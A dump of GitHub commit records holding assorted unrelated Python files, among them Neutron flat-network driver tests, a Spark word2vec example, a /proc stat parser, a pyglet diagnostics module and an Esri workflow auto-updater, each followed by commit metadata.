    it allows isinstance() calls against plain built-in instances to pass
    even though they are not instances of the override subclass.
    """
    class UnmodifiedIsInstance(type):
        # Route isinstance() checks to the original built-in bases, so a
        # plain built-in instance still satisfies the override class.
        def __instancecheck__(cls, instance):
            return isinstance(instance, bases)
    return with_metaclass(UnmodifiedIsInstance, *bases)
| Python | 0.000001 | |
dda01f555231b93b91b71a528c210dd722e370d2 | Add flat type driver unittests | neutron/tests/unit/ml2/test_type_flat.py | neutron/tests/unit/ml2/test_type_flat.py | # Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import exceptions as exc
import neutron.db.api as db
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import type_flat
from neutron.tests import base
FLAT_NETWORKS = 'flat_net1, flat_net2'
class FlatTypeTest(base.BaseTestCase):
    """Unit tests for the ML2 'flat' network type driver."""
    def setUp(self):
        super(FlatTypeTest, self).setUp()
        db.configure_db()
        self.driver = type_flat.FlatTypeDriver()
        # Restrict the driver to the physnets listed in FLAT_NETWORKS.
        self.driver._parse_networks(FLAT_NETWORKS)
        self.session = db.get_session()
        self.addCleanup(db.clear_db)
    def _get_allocation(self, session, segment):
        # Helper: fetch the allocation row for the segment's physnet.
        return session.query(type_flat.FlatAllocation).filter_by(
            physical_network=segment[api.PHYSICAL_NETWORK]).first()
    def test_validate_provider_segment(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'flat_net1'}
        self.driver.validate_provider_segment(segment)
    def test_validate_provider_segment_without_physnet_restriction(self):
        # '*' allows any physical network.
        self.driver._parse_networks('*')
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'other_flat_net'}
        self.driver.validate_provider_segment(segment)
    def test_validate_provider_segment_with_missing_physical_network(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT}
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          segment)
    def test_validate_provider_segment_with_unsupported_physical_network(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'other_flat_net'}
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          segment)
    def test_validate_provider_segment_with_unallowed_segmentation_id(self):
        # Flat networks carry no segmentation id at all.
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'flat_net1',
                   api.SEGMENTATION_ID: 1234}
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          segment)
    def test_reserve_provider_segment(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'flat_net1'}
        self.driver.reserve_provider_segment(self.session, segment)
        alloc = self._get_allocation(self.session, segment)
        self.assertEqual(segment[api.PHYSICAL_NETWORK], alloc.physical_network)
    def test_release_segment(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'flat_net1'}
        self.driver.reserve_provider_segment(self.session, segment)
        self.driver.release_segment(self.session, segment)
        # Releasing must remove the allocation row.
        alloc = self._get_allocation(self.session, segment)
        self.assertIsNone(alloc)
    def test_reserve_provider_segment_already_reserved(self):
        segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                   api.PHYSICAL_NETWORK: 'flat_net1'}
        self.driver.reserve_provider_segment(self.session, segment)
        self.assertRaises(exc.FlatNetworkInUse,
                          self.driver.reserve_provider_segment,
                          self.session, segment)
    def test_allocate_tenant_segment(self):
        # Flat networks cannot be auto-allocated to tenants.
        observed = self.driver.allocate_tenant_segment(self.session)
        self.assertIsNone(observed)
| Python | 0.000001 | |
b52b4cb39029d55a06e15b527cb4789e2988093d | Add word2vec example | word2vec.py | word2vec.py | from pyspark.sql import SparkSession
from pyspark.ml.feature import Word2Vec
def main():
spark = SparkSession.builder \
.appName("Spark CV-job ad matching") \
.config("spark.some.config.option", "some-value") \
.master("local[*]") \
.getOrCreate()
# Input data: Each row is a bag of words from a sentence or document.
documentDF = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), ),
("Logistic regression models are neat".split(" "), )
], ["text"])
documentDF2 = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), )
], ["text"])
# Learn a mapping from words to Vectors.
word2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol="text", outputCol="result")
model = word2Vec.fit(documentDF)
model2 = word2Vec.fit(documentDF2)
result = model.transform(documentDF)
for row in result.collect():
text, vector = row
print("Text: [%s] => \nVector: %s\n" % (", ".join(text), str(vector)))
if __name__ == '__main__':
main()
| Python | 0.002897 | |
9607c55eacfd58704a4e83a2476471aa2da6124c | add package py-doxypypy (#3284) | var/spack/repos/builtin/packages/py-doxypypy/package.py | var/spack/repos/builtin/packages/py-doxypypy/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyDoxypypy(PythonPackage):
    """A Doxygen filter for Python.
    A more Pythonic version of doxypy, a Doxygen filter for Python.
    """
    homepage = "https://github.com/Feneric/doxypypy"
    url = "https://pypi.io/packages/source/d/doxypypy/doxypypy-0.8.8.6.tar.gz"
    # Known release with its MD5 checksum.
    version('0.8.8.6', '6b3fe4eff5d459400071b626333fe15f')
    # Build-time only dependency: setuptools drives the install.
    depends_on('py-setuptools', type='build')
| Python | 0 | |
83fa6b23563903192376a3419b460b9b06479248 | Add procstat.py | src/procstat.py | src/procstat.py | import os.path
import argparse
import logging
logging.basicConfig(level=logging.DEBUG)
class Procstat():
    """Parser for /proc/<pid>/stat that exposes each field by name."""
    PROCSTATPATH = '/proc/%d/stat'
    # Field names in the order they appear in /proc/<pid>/stat; see proc(5).
    STATLIST = (
        'pid', 'comm', 'state', 'ppid', 'pgrp', 'session', 'tty_nr',
        'tpgid', 'flags', 'minflt', 'cminflt', 'mjflt', 'cmajflt',
        'utime', 'stime', 'cutime', 'cstime', 'priority', 'nice',
        'num_threads', 'itrealvalue', 'starttime', 'vsize', 'rss',
        'rsslim', 'startcode', 'endcode', 'startstack', 'kstkesp',
        'kstkeip', 'signal', 'blocked', 'sigignore', 'sigcatch',
        'wchan', 'nswap', 'cnswap', 'exit_signal', 'processor',
        'rt_priority', 'policy', 'delayacct_blkio_ticks',
        'guest_time', 'cguest_time')
    def __init__(self, pid):
        """Read and parse /proc/<pid>/stat for the given *pid*.
        Fixes over the original:
        - the path was formatted with the module-level 'args.pid' instead
          of the 'pid' parameter, so the class only worked when run as a
          script;
        - self.stat is now always defined (empty for an invalid pid),
          avoiding AttributeError from later method calls.
        """
        self.stat = {}
        fstat = self.PROCSTATPATH % pid
        if not os.path.exists(fstat):
            logging.error('PID is not valid')
            return
        with open(fstat, 'r') as f:
            procStat = f.readline().split()
        # NOTE(review): a 'comm' containing spaces would break this
        # split-based parsing; confirm whether that matters here.
        for i in range(len(self.STATLIST)):
            self.stat[self.STATLIST[i]] = procStat[i]
        # Strip the parentheses /proc puts around the command name.
        strComm = self.stat['comm']
        self.stat['comm'] = str(strComm[1:len(strComm) - 1])
    def __str__(self):
        """Return all fields as a single 'name(value)' string."""
        rl = ''
        for i in self.STATLIST:
            rl += '%s(%s)' % (i, self.stat[i])
        return rl
    def getStat(self, name):
        """Return the value stored for *name*, or '' if it is falsy."""
        return self.stat[name] if self.stat[name] else ''
    def printStat(self, readable=False):
        """Print one 'name : value' line per field.
        The *readable* flag is currently unused; kept for interface
        compatibility.
        """
        l = ''
        for i in self.STATLIST:
            l += '%-12s : %s\n' % (i, self.stat[i])
        print(l)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process stat information parser')
parser.add_argument('pid', type=int, help='Pid')
args = parser.parse_args()
pstat = Procstat(args.pid)
pstat.printStat()
| Python | 0 | |
0728e6a4f8f06e1d4d137259f76796d1dbfa1a9d | add a wsgi.py that eagerly reads in POSTdata | edx_ora/wsgi_eager.py | edx_ora/wsgi_eager.py | """
WSGI config for ora project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "edx_ora.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import WSGIHandler
class ForceReadPostHandler(WSGIHandler):
    """WSGIHandler that forces reading POST data before forwarding to the
    application.
    nginx as a proxy expects the backend to respond only after the
    whole body of the request has been read.  In some cases (see below)
    the backend starts responding before reading the request.  This
    causes nginx to return a 502 error, instead of forwarding the
    proper response to the client, which makes very hard to debug
    problems with the backend.
    Cases where the backend responds early:
      - Early errors from django, for example errors from view decorators.
      - POST request with large payloads, which may get chunked by nginx.
        django sends a 100 Continue response before reading the whole body.
    For more information:
    http://kudzia.eu/b/2012/01/switching-from-apache2-to-nginx-as-reverse-proxy
    """
    def get_response(self, request):
        # Touching request.POST makes Django consume the entire request
        # body up front; the copied value itself is intentionally unused.
        data = request.POST.copy()  # read the POST data passing it
        return super(ForceReadPostHandler, self).get_response(request)
application = ForceReadPostHandler()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| Python | 0 | |
fb336764f1a95d591e04f0061009c555b7217274 | Create FoodDiversity.py | FoodDiversity.py | FoodDiversity.py | import csv
import math
import collections
from collections import Counter
# EntFunc calculates the Shannon index for the diversity of venues in a given zip code.
def EntFunc(list,list2):
k = 0
Entropy = 0
for k in range(0, len(BusinessName)):
if BusinessName[k] != BusinessName[k - 1]:
p = float(BusinessName.count(BusinessName[k])) / float(len(BusinessName))
Entropy = -1.0 * math.log(p) * p + Entropy
k = k + 1
if Entropy != 0: print zip[j],k,Entropy
#Take in data from ESRI business lists by zip code.
#The entry matrix takes in values by zip code then the business name within the zip code.
#The BusinessName list is there simply to take in business names and determine how often unique values repeat for diversity calculations.
ReadFile = 'SIC581208.csv'
inf = csv.reader(open(ReadFile, "rU"))
i = 0
entry=[[],[]]
BusinessName=[]
#Store zip and business name data from ESRI file.
for row in inf:
    i = i + 1
    # i > 1 skips the CSV header row.
    if i > 1:
        entry[0].append(long(row[6]))
        entry[1].append(row[1])
#Sort the zip code values by zip code.
zip = sorted(list(set(entry[0])),key=float)
#Sort all stored information by zip code.
#Output business diversity by zip code.
# NOTE(review): entry.sort() below sorts entry's TWO sub-lists relative to
# each other (zip list vs name list), not the paired rows -- presumably a
# bug; confirm the intended pairing survives.
# NOTE(review): the final zip group is never passed to EntFunc because the
# loop ends without a trailing flush -- confirm this is intentional.
j=0
entry.sort(key=lambda x: x[0])
for i in range(0,len(entry[0])):
    if entry[0][i] == zip[j]:
        BusinessName.append(entry[1][i])
    else:
        EntFunc(BusinessName,zip[j])
        j=j+1
        BusinessName=[]
| Python | 0 | |
388a7eea596fdbcd79005b06d26d54b182b75696 | add package | package.py | package.py | # coding=UTF-8
#!/usr/bin/python
'''
文件夹结构 --zip
animate
unzip.py
release
'''
import os, sys, zipfile
import shutil
import commands
# Config
dir = "equip"
output = "output"
def texturePacker(floder, oriName):
    '''
    Pack the images in the current directory into a sprite sheet named
    <oriName> inside ../<floder>/ (translated from the original Chinese
    comment "pack images").
    '''
    target = "../" + floder + "/"
    #pwd
    #--content-protection 64baaa7a545a4eb7a90f7a452a703f13
    ## Pack the atlas (spine format, RGBA4444, Atkinson dithering).
    cmd = "TexturePacker --size-constraints NPOT --force-squared --multipack --force-word-aligned --algorithm MaxRects --premultiply-alpha --format spine --opt RGBA4444 --dither-atkinson-alpha --data " + target + oriName + ".atlas --texture-format png --sheet " + target + oriName + ".png " + "./"
    #cmd = "TexturePacker --size-constraints NPOT --force-squared --content-protection 64baaa7a545a4eb7a90f7a452a703f13 --multipack --force-word-aligned --algorithm MaxRects --reduce-border-artifacts --format cocos2d --opt RGBA4444 --dither-fs-alpha --data " + target + "animate.plist --texture-format pvr2ccz --sheet " + target + "animate.pvr.ccz " + target + "texture/"
    print commands.getoutput(cmd)
    print "-------" + oriName + " is success-----"
def run():
    '''Group each equipment folder's PNGs into per-slot sets (horse, helmet,
    armour, weapon, faces) and pack each non-empty set with TexturePacker
    into the output folder.
    '''
    # Maps a pack name to the list of image basenames belonging to it.
    nameConfig = {"horse": ["ma-bz", "ma-jiao-q", "ma-dt-q", "ma-xt-q", "ma-pg", "ma-yao", "ma-xiong", "ma-jiao-h", "ma-dt-h", "ma-xt-h", "ma-wb-s", "ma-tou", "ma-jiao-h-01", "ma-dt-h-01", "ma-xt-h-01", "ma-jiao-q-01", "ma-dt-q-01", "ma-xt-q-01"],
                  "helmet":["tou-tk", "tou-tk-s", "tou-tf-r", "tou-tf-l", "tou-tk-h"],
                  "armour":["db-r-s", "xb-r", "yd", "qz-r", "qz-l", "qz-m", "xt-l", "dt-r", "yao-q", "xiong", "bozi", "pg", "yao", "shou-l", "shou-r", "xb-l", "db-l-s", "db-l", "pf", "xiong-q"],
                  "weapon":["wq-r", "wq-l"],
                  "face": ["tou"],
                  "face1": ["tou1"],
                  "face2": ["tou2"],
                  "face3": ["tou3"],
                  "face4": ["tou4"],
                  "face5": ["tou5"],
                  "face6": ["tou6"],
                  "face7": ["tou7"],
                  "face8": ["tou8"],
                  "face9": ["tou9"]
                  }
    list = os.listdir(dir)
    # Recreate the output directory from scratch on every run.
    if os.path.exists(output):
        shutil.rmtree(output)
    os.mkdir(output)
    for l in list:
        tf = os.path.join(dir, l)
        if os.path.isdir(tf):
            #os.chdir(tf)
            #pngList = os.listdir(os.getcwd())
            for (key , value) in nameConfig.items():
                print key, value
                # Stage this group's PNGs in a temporary folder, pack from
                # there, then remove it.
                tmp = os.path.join(output, "tmp")
                if os.path.exists(tmp) == False:
                    os.mkdir(tmp)
                for e in value :
                    copyFile = os.path.join(os.getcwd(), tf, e + ".png")
                    if os.path.exists(copyFile):
                        shutil.copy(copyFile, tmp)
                tmpLen = len(os.listdir(tmp))
                # texturePacker() packs the *current* directory, so chdir in.
                os.chdir(os.path.join(output, "tmp"))
                #print("HHHHHHH:" + len(os.listdir(tmp)))
                if tmpLen > 0:
                    texturePacker(l, key)
                os.chdir("../../")
                shutil.rmtree(tmp)
    return
#main fun
run()
| Python | 0.000001 | |
40d687be843e3de56eb00a028e07866391593315 | Add defaults.py | salt/defaults.py | salt/defaults.py | # -*- coding: utf-8 -*-
'''
Default values, to be imported elsewhere in Salt code
Do NOT, import any salt modules (salt.utils, salt.config, etc.) into this file,
as this may result in circular imports.
'''
# Default delimiter for multi-level traversal in targeting
DEFAULT_TARGET_DELIM = ':'
| Python | 0 | |
26db82fd8560d54b1f385814b8871e6fba42fa91 | Add Linked List (#71) | utilities/python/linked_list.py | utilities/python/linked_list.py | # Singly-Linked List
#
# The linked list is passed around as a variable pointing to the
# root node of the linked list, or None if the list is empty.
class LinkedListNode:
    """One cell of a singly-linked list."""
    def __init__(self, value):
        # Payload stored in this node.
        self.value = value
        # Successor node; None marks the end of the list.
        self.next = None
def linked_list_append(linked_list, value):
    '''Appends a value to the end of the linked list'''
    tail = LinkedListNode(value)
    if not linked_list:
        # Empty list: the new node becomes the head.
        return tail
    cursor = linked_list
    while cursor.next is not None:
        cursor = cursor.next
    cursor.next = tail
    return linked_list
def linked_list_insert_index(linked_list, value, index):
    '''Inserts a value at a particular index'''
    fresh = LinkedListNode(value)
    if index == 0:
        # New head: link it in front of the old head.
        fresh.next = linked_list
        return fresh
    # Walk to the node just before the insertion point; raise if the
    # list is shorter than the requested index.
    prev = linked_list
    for _ in range(index - 1):
        prev = prev.next
        if not prev:
            raise ValueError
    fresh.next = prev.next
    prev.next = fresh
    return linked_list
def linked_list_delete(linked_list, value):
    '''Deletes the first occurrence of a value in the linked list'''
    if linked_list.value == value:
        # Head match: the second node becomes the new head.
        return linked_list.next
    prev = linked_list
    while prev.next is not None:
        if prev.next.value == value:
            prev.next = prev.next.next  # Unlink the matching node.
            return linked_list
        prev = prev.next
    raise ValueError  # Value not present in the list.
def linked_list_delete_index(linked_list, index):
    '''Deletes the element at a particular index in the linked list'''
    if index == 0:
        # Drop the head node.
        return linked_list.next
    # Stop on the node just before the one being removed.
    prev = linked_list
    for _ in range(index - 1):
        prev = prev.next
        if not prev:
            raise ValueError
    if not prev.next:
        raise ValueError  # Index is one past the end.
    prev.next = prev.next.next
    return linked_list
def linked_list_iter(linked_list):
    '''Lazy iterator over each node in the linked list'''
    cursor = linked_list
    while cursor is not None:
        yield cursor  # Hand back the node itself, not just its value.
        cursor = cursor.next
# Demo / smoke test: exercise every linked-list operation and print the
# list contents after each mutation.
# Append to back
linked_list = None  # Start with an empty linked list
linked_list = linked_list_append(linked_list, 1)
linked_list = linked_list_append(linked_list, 2)
linked_list = linked_list_append(linked_list, 4)
print([node.value for node in linked_list_iter(linked_list)])
# Insert by index
linked_list = linked_list_insert_index(linked_list, 0, 0)  # Front
print([node.value for node in linked_list_iter(linked_list)])
linked_list = linked_list_insert_index(linked_list, 3, 3)  # Back
print([node.value for node in linked_list_iter(linked_list)])
# Delete "3"
linked_list = linked_list_delete(linked_list, 3)
print([node.value for node in linked_list_iter(linked_list)])
# Delete by index
linked_list = linked_list_delete_index(linked_list, 0)
print([node.value for node in linked_list_iter(linked_list)])
linked_list = linked_list_delete_index(linked_list, 1)
print([node.value for node in linked_list_iter(linked_list)])
# Delete until empty
linked_list = linked_list_delete_index(linked_list, 0)
linked_list = linked_list_delete_index(linked_list, 0)
print([node.value for node in linked_list_iter(linked_list)])
| Python | 0 | |
e3fada7038509faa7f057d37d485f15f7851196b | Create ProgramCheckAndUpdate.py | scripts/ProgramCheckAndUpdate.py | scripts/ProgramCheckAndUpdate.py | # ------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: ProgramCheckandUpdate.py
# Description: Checks and Updates workflow from Github if required.
# Version: 20190106
# Requirements:
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
#!/usr/bin/env pythonimport requests
from datetime import datetime
import datetime as dt
import json
import os
import io
import requests
import zipfile
from dateutil.relativedelta import *
class ProgramCheckAndUpdate(object):
    """Check a local repository's CheckForUpdate.json against a remote
    version descriptor and optionally download a newer copy.

    The class keeps no state of its own; every method works on the data
    passed in, so a single instance may be reused freely.
    """

    def readCheckForUpdate(self, filepath):
        """Read and parse the local CheckForUpdate JSON file.

        Returns the parsed dict, or None when the file is missing,
        unreadable or not valid JSON.
        """
        try:
            # `with` guarantees the handle is closed (the original leaked it).
            with open(filepath) as f:
                return json.loads(f.read())
        except Exception:
            return None

    def readVersionJSON(self, checkFileURL):
        """Download and parse the remote version descriptor.

        Returns the parsed dict, or None on any network/parse failure.
        """
        try:
            response = requests.get(checkFileURL)
            return json.loads(response.content)
        except Exception:
            return None

    def checkUpdate(self, dict_check, versionJSON):
        """Compare the remote version against the local one.

        Always stamps dict_check['LastChecked'] with today's date.  When
        the remote version is newer, its metadata is copied into
        dict_check.  Returns [update_available, dict_check];
        [False, None] when either argument is malformed.

        NOTE: versions are compared lexicographically, matching the
        original behaviour; this mis-orders e.g. '10.0' vs '9.0'.
        """
        try:
            dict_check['LastChecked'] = datetime.today().strftime('%Y-%m-%d')
            if versionJSON['Version'] > dict_check['CurrentVersion']:
                dict_check['NewVersion'] = versionJSON['Version']
                dict_check['VersionMessage'] = versionJSON['Message']
                dict_check['UpdateLocation'] = versionJSON['Install']
                return [True, dict_check]
            return [False, dict_check]
        except Exception:
            return [False, None]

    def UpdateLocalRepo(self, install_url, path):
        """Download the repository's master-branch zip and extract it to
        `path`."""
        download_url = install_url.rstrip('/') + '/archive/master.zip'
        repo_download = requests.get(download_url)
        zip_repo = zipfile.ZipFile(io.BytesIO(repo_download.content))
        zip_repo.extractall(path)

    def WriteNewCheckForUpdate(self, dict_check, filepath):
        """Persist dict_check as pretty-printed JSON.

        Returns True on success, False on any write/serialisation error.
        """
        try:
            with open(filepath, 'w') as f:
                json.dump(dict_check, f, indent=4)
            return True
        except Exception:
            return False

    def IsCheckRequired(self, dict_check):
        """Decide whether an update check is due today.

        Supported 'CheckForUpdate' values: 'Never', 'Daily', 'Monthly'
        (30 days).  A missing/empty 'LastChecked' counts as 1970-01-01.

        BUGFIX: the original silently fell off the end (returning None)
        for any unrecognised interval; that case now returns False.
        Returns None only when dict_check is malformed.
        """
        try:
            lastChecked = dict_check.get('LastChecked') or '1970-01-01'
            checkForUpdate = dict_check['CheckForUpdate']
            current_date = datetime.today().strftime('%Y-%m-%d')
            if checkForUpdate == 'Never':
                return False
            if checkForUpdate == 'Daily':
                # ISO dates compare correctly as plain strings.
                return current_date > lastChecked
            if checkForUpdate == 'Monthly':
                last = datetime.strptime(lastChecked, '%Y-%m-%d')
                due = (last + dt.timedelta(days=30)).strftime('%Y-%m-%d')
                return current_date > due
            return False
        except Exception:
            return None

    def run(self, localrepo_path):
        """Run the whole check/update cycle for one local repository.

        Returns a human-readable status/error string, or None when there
        is nothing to report.
        """
        try:
            checkUpdateFilePath = os.path.join(localrepo_path, "CheckForUpdate.json")
            chkupdate = self.readCheckForUpdate(checkUpdateFilePath)
            if chkupdate is None:
                return "Unable to read CheckForUpdate JSON"
            if not self.IsCheckRequired(chkupdate):
                # Not due yet: still record that we looked today.
                try:
                    chkupdate['LastChecked'] = datetime.today().strftime('%Y-%m-%d')
                    self.WriteNewCheckForUpdate(chkupdate, checkUpdateFilePath)
                except Exception as e:
                    return str(e)
                return None
            versionJSON = self.readVersionJSON(checkFileURL=chkupdate['CheckFile'])
            if versionJSON is None:
                return "Unable to read VersionJSON"
            update_available, dict_check = self.checkUpdate(chkupdate, versionJSON)
            if dict_check is None:
                return "Version comparison failed"
            self.WriteNewCheckForUpdate(dict_check, checkUpdateFilePath)
            # BUGFIX: the original acted on OnNewVersion even when no newer
            # version existed; only act when an update really is available.
            if not update_available:
                return None
            on_new_version = dict_check['OnNewVersion']
            if on_new_version == "Warn":
                return "Update Available, but not updating"
            if on_new_version == "Ignore":
                return "Ignore"
            if on_new_version == "Update":
                self.UpdateLocalRepo(
                    versionJSON['Install'],
                    path=os.path.join(os.path.dirname(localrepo_path), "Updated"))
                return None
            return "Incorrect Parameter. Please check OnNewVersion Parameter in CheckForUpdate.txt"
        except Exception as e:
            return str(e)
# Example implementation: run the updater against a local checkout.
# Guarded so that merely importing this module does not trigger file and
# network I/O (the original ran unconditionally at import time).
if __name__ == '__main__':
    a = ProgramCheckAndUpdate()
    x = a.run("C:\\Image_Mgmt_Workflows\\mdcs-py-master")
| Python | 0 | |
43510585fcf2d9bd3953f3a4948f3aaebbc00e10 | Add pyglet.info | pyglet/info.py | pyglet/info.py | #!/usr/bin/env python
'''Get environment information useful for debugging.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
_first_heading = True
def _heading(heading):
global _first_heading
if not _first_heading:
print
else:
_first_heading = False
print heading
print '-' * 78
def dump_python():
    '''Dump Python version and environment to stdout.'''
    import os
    import sys
    print 'sys.version:', sys.version
    print 'sys.platform:', sys.platform
    print 'os.getcwd():', os.getcwd()
    # Only environment variables that configure pyglet are of interest here.
    for key, value in os.environ.items():
        if key.startswith('PYGLET_'):
            print "os.environ['%s']: %s" % (key, value)

def dump_pyglet():
    '''Dump pyglet version and options.'''
    import pyglet
    print 'pyglet.version:', pyglet.version
    print 'pyglet.__file__:', pyglet.__file__
    # pyglet.options is a dict of runtime configuration flags.
    for key, value in pyglet.options.items():
        print "pyglet.options['%s'] = %r" % (key, value)
def dump_window():
    '''Dump display, window, screen and default config info.'''
    import pyglet.window
    platform = pyglet.window.get_platform()
    print 'platform:', repr(platform)
    display = platform.get_default_display()
    print 'display:', repr(display)
    screens = display.get_screens()
    for i, screen in enumerate(screens):
        print 'screens[%d]: %r' % (i, screen)
    # Creating (and closing) a throwaway window exposes the GL config and
    # context that pyglet actually selects by default.
    window = pyglet.window.Window()
    for key, value in window.config.get_gl_attributes():
        print "config['%s'] = %r" % (key, value)
    print 'context:', repr(window.context)
    window.close()

def dump_gl():
    '''Dump GL info.'''
    from pyglet.gl import gl_info
    print 'gl_info.get_version():', gl_info.get_version()
    print 'gl_info.get_vendor():', gl_info.get_vendor()
    print 'gl_info.get_renderer():', gl_info.get_renderer()
    print 'gl_info.get_extensions():'
    # Sort the extension names so the output is stable and diffable.
    extensions = list(gl_info.get_extensions())
    extensions.sort()
    for name in extensions:
        print ' ', name

def dump_glu():
    '''Dump GLU info.'''
    from pyglet.gl import glu_info
    print 'glu_info.get_version():', glu_info.get_version()
    print 'glu_info.get_extensions():'
    extensions = list(glu_info.get_extensions())
    extensions.sort()
    for name in extensions:
        print ' ', name
def dump_media():
    '''Dump pyglet.media info.'''
    import pyglet.media
    print 'driver:', pyglet.media.driver.__name__

def dump_avbin():
    '''Dump AVbin info.'''
    try:
        import pyglet.media.avbin
        print 'Library:', pyglet.media.avbin.av
        print 'AVbin version:', pyglet.media.avbin.av.avbin_get_version()
        print 'FFmpeg revision:', \
            pyglet.media.avbin.av.avbin_get_ffmpeg_revision()
    except:
        # AVbin is an optional dependency; any import/load failure simply
        # means it is not installed.
        print 'AVbin not available.'

def _try_dump(heading, func):
    # Run one dump section, printing a traceback instead of aborting the
    # whole report when that section fails.
    _heading(heading)
    try:
        func()
    except:
        import traceback
        traceback.print_exc()
def dump():
    '''Dump all information to stdout.'''
    # Each section is isolated: a failure in one does not stop the others.
    _try_dump('Python', dump_python)
    _try_dump('pyglet', dump_pyglet)
    _try_dump('pyglet.window', dump_window)
    _try_dump('pyglet.gl.gl_info', dump_gl)
    _try_dump('pyglet.gl.glu_info', dump_glu)
    _try_dump('pyglet.media', dump_media)
    _try_dump('pyglet.media.avbin', dump_avbin)

if __name__ == '__main__':
    dump()
| Python | 0 | |
52dc608438940e098900e1380f11ee3094c118ae | Add log file in script higher_education and add download by year. | scripts/data_download/higher_education/create_files.py | scripts/data_download/higher_education/create_files.py | # -*- coding: utf-8 -*-
'''
python scripts/data_download/higher_education/create_files.py en scripts/data/higher_education/en/ 2009
'''
from collections import namedtuple
from datetime import datetime
import pandas as pd
import os
import bz2
import sys
import logging
import imp
def local_imports():
    """Load the shared `common` and `dictionary` helper modules from the
    data_download scripts directory into module-level globals."""
    global common, dictionary
    f, filename, desc = imp.find_module('common', ['./scripts/data_download/'])
    common = imp.load_module('common', f, filename, desc)
    f, filename, desc = imp.find_module('dictionary', ['./scripts/data_download/'])
    # NOTE(review): the dictionary module is registered in sys.modules under
    # the name 'common' here (overwriting the entry loaded above) -- this
    # looks like a copy/paste slip; confirm it is intentional.
    dictionary = imp.load_module('common', f, filename, desc)
def select_table(conditions):
    """Pick the hedu_* table name matching the active filters.

    conditions[1] is the location filter and conditions[2] the major
    filter; the literal ' 1 = 1 ' (with surrounding spaces) means
    "no filter" for that dimension.  The suffix encodes the dimensions
    present: y(ear), b(ra/location), c(ourse/major).
    """
    no_filter = ' 1 = 1 '
    has_location = conditions[1] != no_filter
    has_major = conditions[2] != no_filter
    suffix = 'y'
    # 'b' is present when a location filter is active, and also for the
    # fully-unfiltered case (no location AND no major).
    if has_location or not has_major:
        suffix += 'b'
    if has_major:
        suffix += 'c'
    return 'hedu_' + suffix
def save(year, locations, majors, lang, output_path):
    """Export one bz2-compressed CSV per (year, location, major) filter
    combination, querying the hedu_* table chosen by select_table."""
    conditions = [' 1 = 1', ' 1 = 1', ' 1 = 1'] # 5 condicoes
    table_columns = {}
    columns_deleted=['bra_id_len', 'course_hedu_id_len', 'enrolled_rca']
    # Column headers are translated via the dictionary helper module.
    if lang == 'en':
        dic_lang = dictionary.en
    else:
        dic_lang = dictionary.pt
    conditions[0] = year.condition
    for location in locations:
        conditions[1] = location.condition
        for major in majors:
            conditions[2] = major.condition
